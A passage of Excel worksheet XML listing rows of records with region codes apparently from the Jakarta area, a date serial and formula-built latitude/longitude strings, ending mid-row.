      <c r="W1636" s="5">
        <v>-624496</v>
      </c>
      <c r="X1636" t="s">
        <v>19696</v>
      </c>
      <c r="Y1636" t="str">
        <f t="shared" si="25"/>
        <v>-6.24496,107.08719</v>
      </c>
    </row>
    <row r="1637" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1637">
        <v>109162</v>
      </c>
      <c r="B1637" s="1">
        <v>43886</v>
      </c>
      <c r="C1637">
        <v>0</v>
      </c>
      <c r="D1637" t="s">
        <v>22</v>
      </c>
      <c r="E1637" t="s">
        <v>23</v>
      </c>
      <c r="F1637" t="s">
        <v>5630</v>
      </c>
      <c r="G1637" t="s">
        <v>5631</v>
      </c>
      <c r="H1637" t="s">
        <v>26</v>
      </c>
      <c r="I1637" t="s">
        <v>3275</v>
      </c>
      <c r="J1637" t="s">
        <v>5632</v>
      </c>
      <c r="M1637">
        <v>3172050003</v>
      </c>
      <c r="N1637">
        <v>3172050</v>
      </c>
      <c r="O1637">
        <v>3172</v>
      </c>
      <c r="P1637">
        <v>31</v>
      </c>
      <c r="Q1637" t="s">
        <v>2896</v>
      </c>
      <c r="R1637" t="s">
        <v>358</v>
      </c>
      <c r="S1637" t="s">
        <v>49</v>
      </c>
      <c r="T1637" t="s">
        <v>33</v>
      </c>
      <c r="U1637" s="5">
        <v>10686754</v>
      </c>
      <c r="V1637" s="5" t="s">
        <v>15932</v>
      </c>
      <c r="W1637" s="5">
        <v>-628294</v>
      </c>
      <c r="X1637" t="s">
        <v>19697</v>
      </c>
      <c r="Y1637" t="str">
        <f t="shared" si="25"/>
        <v>-6.28294,106.86754</v>
      </c>
    </row>
    <row r="1638" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1638">
        <v>109163</v>
      </c>
      <c r="B1638" s="1">
        <v>43886</v>
      </c>
      <c r="C1638">
        <v>0</v>
      </c>
      <c r="D1638" t="s">
        <v>22</v>
      </c>
      <c r="E1638" t="s">
        <v>23</v>
      </c>
      <c r="F1638" t="s">
        <v>5633</v>
      </c>
      <c r="G1638" t="s">
        <v>5634</v>
      </c>
      <c r="H1638" t="s">
        <v>26</v>
      </c>
      <c r="I1638" t="s">
        <v>65</v>
      </c>
      <c r="J1638" t="s">
        <v>2627</v>
      </c>
      <c r="L1638" t="s">
        <v>5635</v>
      </c>
      <c r="M1638">
        <v>3275061004</v>
      </c>
      <c r="N1638">
        <v>3275061</v>
      </c>
      <c r="O1638">
        <v>3275</v>
      </c>
      <c r="P1638">
        <v>32</v>
      </c>
      <c r="Q1638" t="s">
        <v>39</v>
      </c>
      <c r="R1638" t="s">
        <v>40</v>
      </c>
      <c r="S1638" t="s">
        <v>41</v>
      </c>
      <c r="T1638" t="s">
        <v>42</v>
      </c>
      <c r="U1638" s="5">
        <v>10699312</v>
      </c>
      <c r="V1638" s="5" t="s">
        <v>15933</v>
      </c>
      <c r="W1638" s="5">
        <v>-617712</v>
      </c>
      <c r="X1638" t="s">
        <v>19698</v>
      </c>
      <c r="Y1638" t="str">
        <f t="shared" si="25"/>
        <v>-6.17712,106.99312</v>
      </c>
    </row>
    <row r="1639" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1639">
        <v>109164</v>
      </c>
      <c r="B1639" s="1">
        <v>43886</v>
      </c>
      <c r="C1639">
        <v>0</v>
      </c>
      <c r="D1639" t="s">
        <v>22</v>
      </c>
      <c r="E1639" t="s">
        <v>23</v>
      </c>
      <c r="F1639" t="s">
        <v>5636</v>
      </c>
      <c r="G1639" t="s">
        <v>5637</v>
      </c>
      <c r="H1639" t="s">
        <v>26</v>
      </c>
      <c r="I1639" t="s">
        <v>878</v>
      </c>
      <c r="J1639" t="s">
        <v>2627</v>
      </c>
      <c r="L1639" t="s">
        <v>5638</v>
      </c>
      <c r="M1639">
        <v>3275050007</v>
      </c>
      <c r="N1639">
        <v>3275050</v>
      </c>
      <c r="O1639">
        <v>3275</v>
      </c>
      <c r="P1639">
        <v>32</v>
      </c>
      <c r="Q1639" t="s">
        <v>954</v>
      </c>
      <c r="R1639" t="s">
        <v>955</v>
      </c>
      <c r="S1639" t="s">
        <v>41</v>
      </c>
      <c r="T1639" t="s">
        <v>42</v>
      </c>
      <c r="U1639" s="5">
        <v>10698897</v>
      </c>
      <c r="V1639" s="5" t="s">
        <v>15934</v>
      </c>
      <c r="W1639" s="5">
        <v>-623847</v>
      </c>
      <c r="X1639" t="s">
        <v>19699</v>
      </c>
      <c r="Y1639" t="str">
        <f t="shared" si="25"/>
        <v>-6.23847,106.98897</v>
      </c>
    </row>
    <row r="1640" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1640">
        <v>109165</v>
      </c>
      <c r="B1640" s="1">
        <v>43886</v>
      </c>
      <c r="C1640">
        <v>0</v>
      </c>
      <c r="D1640" t="s">
        <v>22</v>
      </c>
      <c r="E1640" t="s">
        <v>23</v>
      </c>
      <c r="F1640" t="s">
        <v>5639</v>
      </c>
      <c r="G1640" t="s">
        <v>5640</v>
      </c>
      <c r="H1640" t="s">
        <v>26</v>
      </c>
      <c r="I1640" t="s">
        <v>2073</v>
      </c>
      <c r="J1640" t="s">
        <v>5641</v>
      </c>
      <c r="M1640">
        <v>3173070002</v>
      </c>
      <c r="N1640">
        <v>3173070</v>
      </c>
      <c r="O1640">
        <v>3173</v>
      </c>
      <c r="P1640">
        <v>31</v>
      </c>
      <c r="Q1640" t="s">
        <v>2710</v>
      </c>
      <c r="R1640" t="s">
        <v>323</v>
      </c>
      <c r="S1640" t="s">
        <v>62</v>
      </c>
      <c r="T1640" t="s">
        <v>33</v>
      </c>
      <c r="U1640" s="5">
        <v>10683529</v>
      </c>
      <c r="V1640" s="5" t="s">
        <v>15875</v>
      </c>
      <c r="W1640" s="5">
        <v>-614647</v>
      </c>
      <c r="X1640" t="s">
        <v>19700</v>
      </c>
      <c r="Y1640" t="str">
        <f t="shared" si="25"/>
        <v>-6.14647,106.83529</v>
      </c>
    </row>
    <row r="1641" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1641">
        <v>109166</v>
      </c>
      <c r="B1641" s="1">
        <v>43886</v>
      </c>
      <c r="C1641">
        <v>0</v>
      </c>
      <c r="D1641" t="s">
        <v>22</v>
      </c>
      <c r="E1641" t="s">
        <v>23</v>
      </c>
      <c r="F1641" t="s">
        <v>5642</v>
      </c>
      <c r="G1641" t="s">
        <v>5643</v>
      </c>
      <c r="H1641" t="s">
        <v>26</v>
      </c>
      <c r="I1641" t="s">
        <v>628</v>
      </c>
      <c r="J1641" t="s">
        <v>3157</v>
      </c>
      <c r="L1641" t="s">
        <v>5644</v>
      </c>
      <c r="M1641">
        <v>3172070001</v>
      </c>
      <c r="N1641">
        <v>3172070</v>
      </c>
      <c r="O1641">
        <v>3172</v>
      </c>
      <c r="P1641">
        <v>31</v>
      </c>
      <c r="Q1641" t="s">
        <v>127</v>
      </c>
      <c r="R1641" t="s">
        <v>128</v>
      </c>
      <c r="S1641" t="s">
        <v>49</v>
      </c>
      <c r="T1641" t="s">
        <v>33</v>
      </c>
      <c r="U1641" s="5">
        <v>10689311</v>
      </c>
      <c r="V1641" s="5" t="s">
        <v>15935</v>
      </c>
      <c r="W1641" s="5">
        <v>-623381</v>
      </c>
      <c r="X1641" t="s">
        <v>19701</v>
      </c>
      <c r="Y1641" t="str">
        <f t="shared" si="25"/>
        <v>-6.23381,106.89311</v>
      </c>
    </row>
    <row r="1642" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1642">
        <v>109167</v>
      </c>
      <c r="B1642" s="1">
        <v>43886</v>
      </c>
      <c r="C1642">
        <v>0</v>
      </c>
      <c r="D1642" t="s">
        <v>22</v>
      </c>
      <c r="E1642" t="s">
        <v>23</v>
      </c>
      <c r="F1642" t="s">
        <v>5645</v>
      </c>
      <c r="G1642" t="s">
        <v>5646</v>
      </c>
      <c r="H1642" t="s">
        <v>26</v>
      </c>
      <c r="I1642" t="s">
        <v>805</v>
      </c>
      <c r="J1642" t="s">
        <v>5647</v>
      </c>
      <c r="L1642" t="s">
        <v>5648</v>
      </c>
      <c r="M1642">
        <v>3171020006</v>
      </c>
      <c r="N1642">
        <v>3171020</v>
      </c>
      <c r="O1642">
        <v>3171</v>
      </c>
      <c r="P1642">
        <v>31</v>
      </c>
      <c r="Q1642" t="s">
        <v>499</v>
      </c>
      <c r="R1642" t="s">
        <v>484</v>
      </c>
      <c r="S1642" t="s">
        <v>108</v>
      </c>
      <c r="T1642" t="s">
        <v>33</v>
      </c>
      <c r="U1642" s="5">
        <v>10683774</v>
      </c>
      <c r="V1642" s="5" t="s">
        <v>15936</v>
      </c>
      <c r="W1642" s="5">
        <v>-627309</v>
      </c>
      <c r="X1642" t="s">
        <v>19702</v>
      </c>
      <c r="Y1642" t="str">
        <f t="shared" si="25"/>
        <v>-6.27309,106.83774</v>
      </c>
    </row>
    <row r="1643" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1643">
        <v>109168</v>
      </c>
      <c r="B1643" s="1">
        <v>43886</v>
      </c>
      <c r="C1643">
        <v>0</v>
      </c>
      <c r="D1643" t="s">
        <v>22</v>
      </c>
      <c r="E1643" t="s">
        <v>23</v>
      </c>
      <c r="F1643" t="s">
        <v>5649</v>
      </c>
      <c r="G1643" t="s">
        <v>5650</v>
      </c>
      <c r="H1643" t="s">
        <v>26</v>
      </c>
      <c r="I1643" t="s">
        <v>666</v>
      </c>
      <c r="J1643" t="s">
        <v>550</v>
      </c>
      <c r="M1643">
        <v>3172040003</v>
      </c>
      <c r="N1643">
        <v>3172040</v>
      </c>
      <c r="O1643">
        <v>3172</v>
      </c>
      <c r="P1643">
        <v>31</v>
      </c>
      <c r="Q1643" t="s">
        <v>552</v>
      </c>
      <c r="R1643" t="s">
        <v>281</v>
      </c>
      <c r="S1643" t="s">
        <v>49</v>
      </c>
      <c r="T1643" t="s">
        <v>33</v>
      </c>
      <c r="U1643" s="5">
        <v>10687702</v>
      </c>
      <c r="V1643" s="5" t="s">
        <v>15864</v>
      </c>
      <c r="W1643" s="5">
        <v>-625116</v>
      </c>
      <c r="X1643" t="s">
        <v>19703</v>
      </c>
      <c r="Y1643" t="str">
        <f t="shared" si="25"/>
        <v>-6.25116,106.87702</v>
      </c>
    </row>
    <row r="1644" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1644">
        <v>109169</v>
      </c>
      <c r="B1644" s="1">
        <v>43886</v>
      </c>
      <c r="C1644">
        <v>0</v>
      </c>
      <c r="D1644" t="s">
        <v>22</v>
      </c>
      <c r="E1644" t="s">
        <v>23</v>
      </c>
      <c r="F1644" t="s">
        <v>5651</v>
      </c>
      <c r="G1644" t="s">
        <v>5652</v>
      </c>
      <c r="H1644" t="s">
        <v>26</v>
      </c>
      <c r="I1644" t="s">
        <v>517</v>
      </c>
      <c r="J1644" t="s">
        <v>2627</v>
      </c>
      <c r="L1644" t="s">
        <v>5653</v>
      </c>
      <c r="M1644">
        <v>3275060001</v>
      </c>
      <c r="N1644">
        <v>3275060</v>
      </c>
      <c r="O1644">
        <v>3275</v>
      </c>
      <c r="P1644">
        <v>32</v>
      </c>
      <c r="Q1644" t="s">
        <v>611</v>
      </c>
      <c r="R1644" t="s">
        <v>114</v>
      </c>
      <c r="S1644" t="s">
        <v>41</v>
      </c>
      <c r="T1644" t="s">
        <v>42</v>
      </c>
      <c r="U1644" s="5">
        <v>10694721</v>
      </c>
      <c r="V1644" s="5" t="s">
        <v>15937</v>
      </c>
      <c r="W1644" s="5">
        <v>-624403</v>
      </c>
      <c r="X1644" t="s">
        <v>19704</v>
      </c>
      <c r="Y1644" t="str">
        <f t="shared" si="25"/>
        <v>-6.24403,106.94721</v>
      </c>
    </row>
    <row r="1645" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1645">
        <v>109170</v>
      </c>
      <c r="B1645" s="1">
        <v>43886</v>
      </c>
      <c r="C1645">
        <v>0</v>
      </c>
      <c r="D1645" t="s">
        <v>22</v>
      </c>
      <c r="E1645" t="s">
        <v>23</v>
      </c>
      <c r="F1645" t="s">
        <v>5654</v>
      </c>
      <c r="G1645" t="s">
        <v>5655</v>
      </c>
      <c r="H1645" t="s">
        <v>26</v>
      </c>
      <c r="I1645" t="s">
        <v>166</v>
      </c>
      <c r="J1645" t="s">
        <v>5656</v>
      </c>
      <c r="L1645" t="s">
        <v>5657</v>
      </c>
      <c r="M1645">
        <v>3175060001</v>
      </c>
      <c r="N1645">
        <v>3175060</v>
      </c>
      <c r="O1645">
        <v>3175</v>
      </c>
      <c r="P1645">
        <v>31</v>
      </c>
      <c r="Q1645" t="s">
        <v>2278</v>
      </c>
      <c r="R1645" t="s">
        <v>2279</v>
      </c>
      <c r="S1645" t="s">
        <v>547</v>
      </c>
      <c r="T1645" t="s">
        <v>33</v>
      </c>
      <c r="U1645" s="5">
        <v>10692086</v>
      </c>
      <c r="V1645" s="5" t="s">
        <v>15938</v>
      </c>
      <c r="W1645" s="5">
        <v>-615720</v>
      </c>
      <c r="X1645" t="s">
        <v>19705</v>
      </c>
      <c r="Y1645" t="str">
        <f t="shared" si="25"/>
        <v>-6.15720,106.92086</v>
      </c>
    </row>
    <row r="1646" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1646">
        <v>109171</v>
      </c>
      <c r="B1646" s="1">
        <v>43886</v>
      </c>
      <c r="C1646">
        <v>0</v>
      </c>
      <c r="D1646" t="s">
        <v>22</v>
      </c>
      <c r="E1646" t="s">
        <v>23</v>
      </c>
      <c r="F1646" t="s">
        <v>5658</v>
      </c>
      <c r="H1646" t="s">
        <v>26</v>
      </c>
      <c r="I1646" t="s">
        <v>1633</v>
      </c>
      <c r="J1646" t="s">
        <v>404</v>
      </c>
      <c r="L1646" t="s">
        <v>5659</v>
      </c>
      <c r="M1646">
        <v>3174020005</v>
      </c>
      <c r="N1646">
        <v>3174020</v>
      </c>
      <c r="O1646">
        <v>3174</v>
      </c>
      <c r="P1646">
        <v>31</v>
      </c>
      <c r="Q1646" t="s">
        <v>30</v>
      </c>
      <c r="R1646" t="s">
        <v>31</v>
      </c>
      <c r="S1646" t="s">
        <v>32</v>
      </c>
      <c r="T1646" t="s">
        <v>33</v>
      </c>
      <c r="U1646" s="5">
        <v>10676828</v>
      </c>
      <c r="V1646" s="5" t="s">
        <v>15939</v>
      </c>
      <c r="W1646" s="5">
        <v>-616760</v>
      </c>
      <c r="X1646" t="s">
        <v>19706</v>
      </c>
      <c r="Y1646" t="str">
        <f t="shared" si="25"/>
        <v>-6.16760,106.76828</v>
      </c>
    </row>
    <row r="1647" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1647">
        <v>109172</v>
      </c>
      <c r="B1647" s="1">
        <v>43886</v>
      </c>
      <c r="C1647">
        <v>0</v>
      </c>
      <c r="D1647" t="s">
        <v>22</v>
      </c>
      <c r="E1647" t="s">
        <v>23</v>
      </c>
      <c r="F1647" t="s">
        <v>5660</v>
      </c>
      <c r="G1647" t="s">
        <v>5661</v>
      </c>
      <c r="H1647" t="s">
        <v>26</v>
      </c>
      <c r="I1647" t="s">
        <v>5662</v>
      </c>
      <c r="J1647" t="s">
        <v>5663</v>
      </c>
      <c r="M1647">
        <v>3172040005</v>
      </c>
      <c r="N1647">
        <v>3172040</v>
      </c>
      <c r="O1647">
        <v>3172</v>
      </c>
      <c r="P1647">
        <v>31</v>
      </c>
      <c r="Q1647" t="s">
        <v>1351</v>
      </c>
      <c r="R1647" t="s">
        <v>281</v>
      </c>
      <c r="S1647" t="s">
        <v>49</v>
      </c>
      <c r="T1647" t="s">
        <v>33</v>
      </c>
      <c r="U1647" s="5">
        <v>10690506</v>
      </c>
      <c r="V1647" s="5" t="s">
        <v>15940</v>
      </c>
      <c r="W1647" s="5">
        <v>-624769</v>
      </c>
      <c r="X1647" t="s">
        <v>19208</v>
      </c>
      <c r="Y1647" t="str">
        <f t="shared" si="25"/>
        <v>-6.24769,106.90506</v>
      </c>
    </row>
    <row r="1648" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1648">
        <v>109173</v>
      </c>
      <c r="B1648" s="1">
        <v>43886</v>
      </c>
      <c r="C1648">
        <v>0</v>
      </c>
      <c r="D1648" t="s">
        <v>22</v>
      </c>
      <c r="E1648" t="s">
        <v>23</v>
      </c>
      <c r="F1648" t="s">
        <v>5664</v>
      </c>
      <c r="G1648" t="s">
        <v>5665</v>
      </c>
      <c r="H1648" t="s">
        <v>26</v>
      </c>
      <c r="I1648" t="s">
        <v>5666</v>
      </c>
      <c r="J1648" t="s">
        <v>2627</v>
      </c>
      <c r="L1648" t="s">
        <v>5667</v>
      </c>
      <c r="M1648">
        <v>3275020006</v>
      </c>
      <c r="N1648">
        <v>3275020</v>
      </c>
      <c r="O1648">
        <v>3275</v>
      </c>
      <c r="P1648">
        <v>32</v>
      </c>
      <c r="Q1648" t="s">
        <v>4024</v>
      </c>
      <c r="R1648" t="s">
        <v>828</v>
      </c>
      <c r="S1648" t="s">
        <v>41</v>
      </c>
      <c r="T1648" t="s">
        <v>42</v>
      </c>
      <c r="U1648" s="5">
        <v>10694173</v>
      </c>
      <c r="V1648" s="5" t="s">
        <v>15941</v>
      </c>
      <c r="W1648" s="5">
        <v>-626991</v>
      </c>
      <c r="X1648" t="s">
        <v>19707</v>
      </c>
      <c r="Y1648" t="str">
        <f t="shared" si="25"/>
        <v>-6.26991,106.94173</v>
      </c>
    </row>
    <row r="1649" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1649">
        <v>109174</v>
      </c>
      <c r="B1649" s="1">
        <v>43886</v>
      </c>
      <c r="C1649">
        <v>0</v>
      </c>
      <c r="D1649" t="s">
        <v>22</v>
      </c>
      <c r="E1649" t="s">
        <v>23</v>
      </c>
      <c r="F1649" t="s">
        <v>5668</v>
      </c>
      <c r="G1649" t="s">
        <v>5669</v>
      </c>
      <c r="H1649" t="s">
        <v>26</v>
      </c>
      <c r="I1649" t="s">
        <v>5670</v>
      </c>
      <c r="J1649" t="s">
        <v>894</v>
      </c>
      <c r="L1649" t="s">
        <v>5671</v>
      </c>
      <c r="M1649">
        <v>3174020005</v>
      </c>
      <c r="N1649">
        <v>3174020</v>
      </c>
      <c r="O1649">
        <v>3174</v>
      </c>
      <c r="P1649">
        <v>31</v>
      </c>
      <c r="Q1649" t="s">
        <v>30</v>
      </c>
      <c r="R1649" t="s">
        <v>31</v>
      </c>
      <c r="S1649" t="s">
        <v>32</v>
      </c>
      <c r="T1649" t="s">
        <v>33</v>
      </c>
      <c r="U1649" s="5">
        <v>10677459</v>
      </c>
      <c r="V1649" s="5" t="s">
        <v>15942</v>
      </c>
      <c r="W1649" s="5">
        <v>-617135</v>
      </c>
      <c r="X1649" t="s">
        <v>19708</v>
      </c>
      <c r="Y1649" t="str">
        <f t="shared" si="25"/>
        <v>-6.17135,106.77459</v>
      </c>
    </row>
    <row r="1650" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1650">
        <v>109175</v>
      </c>
      <c r="B1650" s="1">
        <v>43886</v>
      </c>
      <c r="C1650">
        <v>0</v>
      </c>
      <c r="D1650" t="s">
        <v>22</v>
      </c>
      <c r="E1650" t="s">
        <v>23</v>
      </c>
      <c r="F1650" t="s">
        <v>5672</v>
      </c>
      <c r="G1650" t="s">
        <v>5673</v>
      </c>
      <c r="H1650" t="s">
        <v>26</v>
      </c>
      <c r="I1650" t="s">
        <v>443</v>
      </c>
      <c r="J1650" t="s">
        <v>5496</v>
      </c>
      <c r="L1650" t="s">
        <v>5674</v>
      </c>
      <c r="M1650">
        <v>3172080003</v>
      </c>
      <c r="N1650">
        <v>3172080</v>
      </c>
      <c r="O1650">
        <v>3172</v>
      </c>
      <c r="P1650">
        <v>31</v>
      </c>
      <c r="Q1650" t="s">
        <v>2250</v>
      </c>
      <c r="R1650" t="s">
        <v>141</v>
      </c>
      <c r="S1650" t="s">
        <v>49</v>
      </c>
      <c r="T1650" t="s">
        <v>33</v>
      </c>
      <c r="U1650" s="5">
        <v>10694442</v>
      </c>
      <c r="V1650" s="5" t="s">
        <v>15943</v>
      </c>
      <c r="W1650" s="5">
        <v>-620846</v>
      </c>
      <c r="X1650" t="s">
        <v>19709</v>
      </c>
      <c r="Y1650" t="str">
        <f t="shared" si="25"/>
        <v>-6.20846,106.94442</v>
      </c>
    </row>
    <row r="1651" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1651">
        <v>109176</v>
      </c>
      <c r="B1651" s="1">
        <v>43886</v>
      </c>
      <c r="C1651">
        <v>0</v>
      </c>
      <c r="D1651" t="s">
        <v>22</v>
      </c>
      <c r="E1651" t="s">
        <v>23</v>
      </c>
      <c r="F1651" t="s">
        <v>5675</v>
      </c>
      <c r="G1651" t="s">
        <v>5676</v>
      </c>
      <c r="H1651" t="s">
        <v>26</v>
      </c>
      <c r="I1651" t="s">
        <v>3481</v>
      </c>
      <c r="J1651" t="s">
        <v>5677</v>
      </c>
      <c r="M1651">
        <v>3172070007</v>
      </c>
      <c r="N1651">
        <v>3172070</v>
      </c>
      <c r="O1651">
        <v>3172</v>
      </c>
      <c r="P1651">
        <v>31</v>
      </c>
      <c r="Q1651" t="s">
        <v>3186</v>
      </c>
      <c r="R1651" t="s">
        <v>128</v>
      </c>
      <c r="S1651" t="s">
        <v>49</v>
      </c>
      <c r="T1651" t="s">
        <v>33</v>
      </c>
      <c r="U1651" s="5">
        <v>10690404</v>
      </c>
      <c r="V1651" s="5" t="s">
        <v>15944</v>
      </c>
      <c r="W1651" s="5">
        <v>-621520</v>
      </c>
      <c r="X1651" t="s">
        <v>19710</v>
      </c>
      <c r="Y1651" t="str">
        <f t="shared" si="25"/>
        <v>-6.21520,106.90404</v>
      </c>
    </row>
    <row r="1652" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1652">
        <v>109177</v>
      </c>
      <c r="B1652" s="1">
        <v>43886</v>
      </c>
      <c r="C1652">
        <v>0</v>
      </c>
      <c r="D1652" t="s">
        <v>22</v>
      </c>
      <c r="E1652" t="s">
        <v>23</v>
      </c>
      <c r="F1652" t="s">
        <v>5678</v>
      </c>
      <c r="H1652" t="s">
        <v>26</v>
      </c>
      <c r="I1652" t="s">
        <v>1538</v>
      </c>
      <c r="J1652" t="s">
        <v>3135</v>
      </c>
      <c r="L1652" t="s">
        <v>5679</v>
      </c>
      <c r="M1652">
        <v>3671010003</v>
      </c>
      <c r="N1652">
        <v>3671010</v>
      </c>
      <c r="O1652">
        <v>3671</v>
      </c>
      <c r="P1652">
        <v>36</v>
      </c>
      <c r="Q1652" t="s">
        <v>400</v>
      </c>
      <c r="R1652" t="s">
        <v>200</v>
      </c>
      <c r="S1652" t="s">
        <v>201</v>
      </c>
      <c r="T1652" t="s">
        <v>171</v>
      </c>
      <c r="U1652" s="5">
        <v>10670754</v>
      </c>
      <c r="V1652" s="5" t="s">
        <v>15945</v>
      </c>
      <c r="W1652" s="5">
        <v>-624359</v>
      </c>
      <c r="X1652" t="s">
        <v>19711</v>
      </c>
      <c r="Y1652" t="str">
        <f t="shared" si="25"/>
        <v>-6.24359,106.70754</v>
      </c>
    </row>
    <row r="1653" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1653">
        <v>109178</v>
      </c>
      <c r="B1653" s="1">
        <v>43886</v>
      </c>
      <c r="C1653">
        <v>0</v>
      </c>
      <c r="D1653" t="s">
        <v>22</v>
      </c>
      <c r="E1653" t="s">
        <v>23</v>
      </c>
      <c r="F1653" t="s">
        <v>5680</v>
      </c>
      <c r="H1653" t="s">
        <v>26</v>
      </c>
      <c r="I1653" t="s">
        <v>5681</v>
      </c>
      <c r="J1653" t="s">
        <v>912</v>
      </c>
      <c r="L1653" t="s">
        <v>5682</v>
      </c>
      <c r="M1653">
        <v>3174040001</v>
      </c>
      <c r="N1653">
        <v>3174040</v>
      </c>
      <c r="O1653">
        <v>3174</v>
      </c>
      <c r="P1653">
        <v>31</v>
      </c>
      <c r="Q1653" t="s">
        <v>730</v>
      </c>
      <c r="R1653" t="s">
        <v>377</v>
      </c>
      <c r="S1653" t="s">
        <v>32</v>
      </c>
      <c r="T1653" t="s">
        <v>33</v>
      </c>
      <c r="U1653" s="5">
        <v>10678674</v>
      </c>
      <c r="V1653" s="5" t="s">
        <v>15946</v>
      </c>
      <c r="W1653" s="5">
        <v>-617036</v>
      </c>
      <c r="X1653" t="s">
        <v>19712</v>
      </c>
      <c r="Y1653" t="str">
        <f t="shared" si="25"/>
        <v>-6.17036,106.78674</v>
      </c>
    </row>
    <row r="1654" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1654">
        <v>109179</v>
      </c>
      <c r="B1654" s="1">
        <v>43886</v>
      </c>
      <c r="C1654">
        <v>0</v>
      </c>
      <c r="D1654" t="s">
        <v>22</v>
      </c>
      <c r="E1654" t="s">
        <v>23</v>
      </c>
      <c r="F1654" t="s">
        <v>5683</v>
      </c>
      <c r="G1654" t="s">
        <v>5684</v>
      </c>
      <c r="H1654" t="s">
        <v>26</v>
      </c>
      <c r="I1654" t="s">
        <v>2962</v>
      </c>
      <c r="J1654" t="s">
        <v>4292</v>
      </c>
      <c r="L1654" t="s">
        <v>3563</v>
      </c>
      <c r="M1654">
        <v>3172070007</v>
      </c>
      <c r="N1654">
        <v>3172070</v>
      </c>
      <c r="O1654">
        <v>3172</v>
      </c>
      <c r="P1654">
        <v>31</v>
      </c>
      <c r="Q1654" t="s">
        <v>3186</v>
      </c>
      <c r="R1654" t="s">
        <v>128</v>
      </c>
      <c r="S1654" t="s">
        <v>49</v>
      </c>
      <c r="T1654" t="s">
        <v>33</v>
      </c>
      <c r="U1654" s="5">
        <v>10690668</v>
      </c>
      <c r="V1654" s="5" t="s">
        <v>15947</v>
      </c>
      <c r="W1654" s="5">
        <v>-621878</v>
      </c>
      <c r="X1654" t="s">
        <v>19713</v>
      </c>
      <c r="Y1654" t="str">
        <f t="shared" si="25"/>
        <v>-6.21878,106.90668</v>
      </c>
    </row>
    <row r="1655" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1655">
        <v>109180</v>
      </c>
      <c r="B1655" s="1">
        <v>43886</v>
      </c>
      <c r="C1655">
        <v>0</v>
      </c>
      <c r="D1655" t="s">
        <v>22</v>
      </c>
      <c r="E1655" t="s">
        <v>23</v>
      </c>
      <c r="F1655" t="s">
        <v>5685</v>
      </c>
      <c r="G1655" t="s">
        <v>5686</v>
      </c>
      <c r="H1655" t="s">
        <v>26</v>
      </c>
      <c r="I1655" t="s">
        <v>5687</v>
      </c>
      <c r="J1655" t="s">
        <v>2627</v>
      </c>
      <c r="L1655" t="s">
        <v>5688</v>
      </c>
      <c r="M1655">
        <v>3216082001</v>
      </c>
      <c r="N1655">
        <v>3216082</v>
      </c>
      <c r="O1655">
        <v>3216</v>
      </c>
      <c r="P1655">
        <v>32</v>
      </c>
      <c r="Q1655" t="s">
        <v>600</v>
      </c>
      <c r="R1655" t="s">
        <v>601</v>
      </c>
      <c r="S1655" t="s">
        <v>41</v>
      </c>
      <c r="T1655" t="s">
        <v>42</v>
      </c>
      <c r="U1655" s="5">
        <v>10703363</v>
      </c>
      <c r="V1655" s="5" t="s">
        <v>15948</v>
      </c>
      <c r="W1655" s="5">
        <v>-622053</v>
      </c>
      <c r="X1655" t="s">
        <v>19714</v>
      </c>
      <c r="Y1655" t="str">
        <f t="shared" si="25"/>
        <v>-6.22053,107.03363</v>
      </c>
    </row>
    <row r="1656" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1656">
        <v>109181</v>
      </c>
      <c r="B1656" s="1">
        <v>43886</v>
      </c>
      <c r="C1656">
        <v>0</v>
      </c>
      <c r="D1656" t="s">
        <v>22</v>
      </c>
      <c r="E1656" t="s">
        <v>23</v>
      </c>
      <c r="F1656" t="s">
        <v>5689</v>
      </c>
      <c r="G1656" t="s">
        <v>5690</v>
      </c>
      <c r="H1656" t="s">
        <v>26</v>
      </c>
      <c r="I1656" t="s">
        <v>2165</v>
      </c>
      <c r="J1656" t="s">
        <v>5496</v>
      </c>
      <c r="L1656" t="s">
        <v>5691</v>
      </c>
      <c r="M1656">
        <v>3172080003</v>
      </c>
      <c r="N1656">
        <v>3172080</v>
      </c>
      <c r="O1656">
        <v>3172</v>
      </c>
      <c r="P1656">
        <v>31</v>
      </c>
      <c r="Q1656" t="s">
        <v>2250</v>
      </c>
      <c r="R1656" t="s">
        <v>141</v>
      </c>
      <c r="S1656" t="s">
        <v>49</v>
      </c>
      <c r="T1656" t="s">
        <v>33</v>
      </c>
      <c r="U1656" s="5">
        <v>10694453</v>
      </c>
      <c r="V1656" s="5" t="s">
        <v>15949</v>
      </c>
      <c r="W1656" s="5">
        <v>-620852</v>
      </c>
      <c r="X1656" t="s">
        <v>19715</v>
      </c>
      <c r="Y1656" t="str">
        <f t="shared" si="25"/>
        <v>-6.20852,106.94453</v>
      </c>
    </row>
    <row r="1657" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1657">
        <v>109182</v>
      </c>
      <c r="B1657" s="1">
        <v>43886</v>
      </c>
      <c r="C1657">
        <v>0</v>
      </c>
      <c r="D1657" t="s">
        <v>22</v>
      </c>
      <c r="E1657" t="s">
        <v>23</v>
      </c>
      <c r="F1657" t="s">
        <v>5692</v>
      </c>
      <c r="G1657" t="s">
        <v>5693</v>
      </c>
      <c r="H1657" t="s">
        <v>26</v>
      </c>
      <c r="I1657" t="s">
        <v>517</v>
      </c>
      <c r="J1657" t="s">
        <v>2683</v>
      </c>
      <c r="L1657" t="s">
        <v>5694</v>
      </c>
      <c r="M1657">
        <v>3172070002</v>
      </c>
      <c r="N1657">
        <v>3172070</v>
      </c>
      <c r="O1657">
        <v>3172</v>
      </c>
      <c r="P1657">
        <v>31</v>
      </c>
      <c r="Q1657" t="s">
